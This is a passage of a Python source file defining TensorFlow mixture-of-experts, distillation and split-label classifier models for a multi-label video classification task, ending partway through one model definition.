# limitations under the License.
"""Contains model definitions."""
import math
import models
import tensorflow as tf
import numpy as np
import utils
from tensorflow import flags
import tensorflow.contrib.slim as slim
FLAGS = flags.FLAGS
flags.DEFINE_integer(
"moe_num_mixtures", 8,
"The number of mixtures (excluding the dummy 'expert') used for MoeModel.")
flags.DEFINE_integer(
"moe_num_extend", 8,
"The number of attention outputs, used for MoeExtendModel.")
flags.DEFINE_string("moe_method", "none",
"The pooling method used in the DBoF cluster layer. "
"used for MoeMaxModel.")
flags.DEFINE_integer(
"class_size", 200,
"The dimention of prediction projection, used for all chain models.")
flags.DEFINE_integer(
"encoder_size", 100,
"The dimention of prediction encoder, used for all mix models.")
flags.DEFINE_integer(
"hidden_size_1", 100,
"The size of the first hidden layer, used forAutoEncoderModel.")
flags.DEFINE_integer(
"hidden_channels", 3,
"The number of hidden layers, only used in early experiment.")
flags.DEFINE_integer(
"moe_layers", 1,
"The number of combine layers, used for combine related models.")
flags.DEFINE_integer(
"softmax_bound", 1000,
"The number of labels to be a group, only used for MoeSoftmaxModel and MoeDistillSplitModel.")
flags.DEFINE_bool(
"moe_group", False,
"Whether to split the 4716 labels into different groups, used in MoeMix4Model and MoeNoiseModel")
flags.DEFINE_float("noise_std", 0.2, "the standard deviation of noise added to the input.")
flags.DEFINE_float("ensemble_w", 1.0, "ensemble weight used in distill chain models.")
class LogisticModel(models.BaseModel):
"""Logistic model with L2 regularization."""
def create_model(self, model_input, vocab_size, l2_penalty=1e-8, **unused_params):
"""Creates a logistic model.
Args:
model_input: 'batch' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes."""
output = slim.fully_connected(
model_input, vocab_size, activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty))
return {"predictions": output}
class MoeModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
shape = model_input.get_shape().as_list()
if FLAGS.frame_features:
model_input = tf.reshape(model_input,[-1,shape[-1]])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
"""
gate_w = tf.get_variable("gate_w", [shape[1], vocab_size * (num_mixtures + 1)], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(gate_w))
gate_activations = tf.matmul(model_input,gate_w)
expert_w = tf.get_variable("expert_w", [shape[1], vocab_size * num_mixtures], tf.float32,
initializer=tf.contrib.layers.xavier_initializer())
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(expert_w))
expert_v = tf.get_variable("expert_v", [vocab_size * num_mixtures], tf.float32,
initializer=tf.constant_initializer(0.0))
tf.add_to_collection(name=tf.GraphKeys.REGULARIZATION_LOSSES, value=l2_penalty*tf.nn.l2_loss(expert_v))
expert_activations = tf.nn.xw_plus_b(model_input,expert_w,expert_v)"""
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
return {"predictions": final_probabilities}
class MoeDistillModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
shape = model_input.get_shape().as_list()
if FLAGS.frame_features:
model_input = tf.reshape(model_input,[-1,shape[-1]])
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_sub_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
if distill_labels is not None:
expert_gate = slim.fully_connected(
model_input,
vocab_size,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="expert_gate")
expert_gate = expert_gate*0.8 + 0.1
final_probabilities = distill_labels*(1.0-expert_gate) + final_sub_probabilities*expert_gate
tf.summary.histogram("expert_gate/activations", expert_gate)
else:
final_probabilities = final_sub_probabilities
return {"predictions": final_probabilities, "predictions_class": final_sub_probabilities}
class MoeDistillEmbeddingModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
"""
embedding_mat = np.loadtxt("./resources/embedding_matrix.model.gz")
embedding_mat = tf.cast(embedding_mat,dtype=tf.float32)
bound = FLAGS.softmax_bound
vocab_size_1 = bound
probabilities_by_distill = distill_labels[:, :vocab_size_1]
embedding_mat = embedding_mat[:vocab_size_1, :]
labels_smooth = tf.matmul(probabilities_by_distill, embedding_mat)
probabilities_by_smooth_1 = (labels_smooth[:, :vocab_size_1] - probabilities_by_distill)/tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True)
probabilities_by_smooth_2 = labels_smooth[:, vocab_size_1:]/tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True)
labels_smooth = tf.concat((probabilities_by_smooth_1, probabilities_by_smooth_2), axis=1)"""
expert_gate = slim.fully_connected(
distill_labels,
1,
activation_fn=tf.nn.sigmoid,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="expert_gate")
#final_probabilities = tf.clip_by_value(distill_labels + labels_smooth, 0.0, 1.0)
final_probabilities = distill_labels
return {"predictions": final_probabilities}
class MoeDistillChainModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
shape = model_input.get_shape().as_list()
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillChainNormModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
model_input = tf.nn.l2_normalize(model_input,dim=1)
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = class_input/tf.reduce_sum(distill_labels,axis=1,keep_dims=True)
class_input = tf.nn.l2_normalize(class_input,dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillChainNorm2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = 256
model_input = tf.nn.l2_normalize(model_input,dim=1)
if distill_labels is not None:
class_input = slim.fully_connected(
distill_labels,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = class_input/tf.reduce_sum(distill_labels,axis=1,keep_dims=True)
class_input = tf.nn.l2_normalize(class_input,dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size])
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplitModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
class_size = 256
probabilities_by_distill = distill_labels[:,vocab_size_1:]
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
#class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
final_probabilities = tf.concat((probabilities_by_class_and_batch, probabilities_by_distill), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplit2Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
class_size = 256
probabilities_by_distill = distill_labels[:,vocab_size_1:]
probabilities_by_residual = tf.clip_by_value(1.0-tf.reduce_sum(probabilities_by_distill,axis=1,keep_dims=True), 0.0, 1.0)
probabilities_by_distill_residual = tf.concat((probabilities_by_residual,probabilities_by_distill), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill_residual,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
final_probabilities = tf.concat((probabilities_by_class_and_batch, probabilities_by_distill), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities}
class MoeDistillSplit3Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
vocab_size_2 = vocab_size - vocab_size_1
class_size = 256
probabilities_by_distill = distill_labels[:,:vocab_size_1]
probabilities_by_residual = distill_labels[:,vocab_size_1:]
feature_size = model_input.get_shape().as_list()[1]
model_input = slim.fully_connected(
model_input,
feature_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="model_inputs")
model_input = tf.nn.l2_normalize(model_input, dim=1)
gate_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-1")
expert_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-1")
gating_distribution_1 = tf.nn.softmax(tf.reshape(
gate_activations_1,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution_1 = tf.nn.sigmoid(tf.reshape(
expert_activations_1,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch_1 = tf.reduce_sum(
gating_distribution_1[:, :num_mixtures] * expert_distribution_1, 1)
probabilities_by_class_and_batch_1 = tf.reshape(probabilities_by_class_and_batch_1,
[-1, vocab_size_1])
probabilities_by_class = tf.concat((probabilities_by_class_and_batch_1, probabilities_by_residual), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
class_input = tf.nn.l2_normalize(class_input, dim=1)
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_2 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_2 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_2])
final_probabilities = tf.concat((probabilities_by_distill, probabilities_by_class_and_batch), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeDistillSplit4Model(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def create_model(self,
model_input,
vocab_size,
distill_labels=None,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
The model consists of a per-class softmax distribution over a
configurable number of logistic classifiers. One of the classifiers in the
mixture is not trained, and always predicts 0.
Args:
model_input: 'batch_size' x 'num_features' matrix of input features.
vocab_size: The number of classes in the dataset.
num_mixtures: The number of mixtures (excluding a dummy 'expert' that
always predicts the non-existence of an entity).
l2_penalty: How much to penalize the squared magnitudes of parameter
values.
Returns:
A dictionary with a tensor containing the probability predictions of the
model in the 'predictions' key. The dimensions of the tensor are
batch_size x num_classes.
"""
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
bound = FLAGS.softmax_bound
vocab_size_1 = bound
vocab_size_2 = vocab_size - vocab_size_1
class_size = 256
probabilities_by_distill = distill_labels[:,:vocab_size_1]
probabilities_by_residual = distill_labels[:,vocab_size_1:]
gate_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates-1")
expert_activations_1 = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts-1")
gating_distribution_1 = tf.nn.softmax(tf.reshape(
gate_activations_1,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution_1 = tf.nn.sigmoid(tf.reshape(
expert_activations_1,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch_1 = tf.reduce_sum(
gating_distribution_1[:, :num_mixtures] * expert_distribution_1, 1)
probabilities_by_class_and_batch_1 = tf.reshape(probabilities_by_class_and_batch_1,
[-1, vocab_size_1])
probabilities_by_class = tf.concat((probabilities_by_class_and_batch_1, probabilities_by_residual), axis=1)
class_input = slim.fully_connected(
probabilities_by_distill,
class_size,
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_inputs")
model_input = tf.concat((model_input,class_input),axis=1)
gate_activations = slim.fully_connected(
model_input,
vocab_size_2 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates")
expert_activations = slim.fully_connected(
model_input,
vocab_size_2 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts")
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_class_and_batch = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_2])
final_probabilities = tf.concat((probabilities_by_distill, probabilities_by_class_and_batch), axis=1)
final_probabilities = final_probabilities*FLAGS.ensemble_w + distill_labels*(1.0-FLAGS.ensemble_w)
return {"predictions": final_probabilities, "predictions_class": probabilities_by_class}
class MoeSoftmaxModel(models.BaseModel):
"""A softmax over a mixture of logistic models (with L2 regularization)."""
def sub_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
name="",
**unused_params):
num_mixtures = num_mixtures or FLAGS.moe_num_mixtures
class_size = FLAGS.class_size
bound = FLAGS.softmax_bound
vocab_size_1 = bound
gate_activations = slim.fully_connected(
model_input,
vocab_size_1 * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="gates"+name)
expert_activations = slim.fully_connected(
model_input,
vocab_size_1 * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="experts"+name)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.sigmoid(tf.reshape(
expert_activations,
[-1, num_mixtures])) # (Batch * #Labels) x num_mixtures
probabilities_by_class_and_batch = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_sigmoid = tf.reshape(probabilities_by_class_and_batch,
[-1, vocab_size_1])
vocab_size_2 = vocab_size - bound
class_size = vocab_size_2
channels = 1
probabilities_by_softmax = []
for i in range(channels):
if i<channels-1:
sub_vocab_size = class_size + 1
else:
sub_vocab_size = vocab_size_2 - (channels-1)*class_size + 1
gate_activations = slim.fully_connected(
model_input,
sub_vocab_size * (num_mixtures + 1),
activation_fn=None,
biases_initializer=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_gates-%s" % i + name)
expert_activations = slim.fully_connected(
model_input,
sub_vocab_size * num_mixtures,
activation_fn=None,
weights_regularizer=slim.l2_regularizer(l2_penalty),
scope="class_experts-%s" % i + name)
gating_distribution = tf.nn.softmax(tf.reshape(
gate_activations,
[-1, num_mixtures + 1])) # (Batch * #Labels) x (num_mixtures + 1)
expert_distribution = tf.nn.softmax(tf.reshape(
expert_activations,
[-1, sub_vocab_size, num_mixtures]),dim=1) # (Batch * #Labels) x num_mixtures
expert_distribution = tf.reshape(expert_distribution,[-1,num_mixtures])
probabilities_by_subvocab = tf.reduce_sum(
gating_distribution[:, :num_mixtures] * expert_distribution, 1)
probabilities_by_subvocab = tf.reshape(probabilities_by_subvocab,
[-1, sub_vocab_size])
probabilities_by_subvocab = probabilities_by_subvocab/tf.reduce_sum(probabilities_by_subvocab,axis=1,keep_dims=True)
if i==0:
probabilities_by_softmax = probabilities_by_subvocab[:,:-1]
else:
probabilities_by_softmax = tf.concat((probabilities_by_softmax, probabilities_by_subvocab[:,:-1]),axis=1)
probabilities_by_class = tf.concat((probabilities_by_sigmoid,probabilities_by_softmax),axis=1)
return probabilities_by_class
def create_model(self,
model_input,
vocab_size,
num_mixtures=None,
l2_penalty=1e-8,
**unused_params):
"""Creates a Mixture of (Logistic) Experts model.
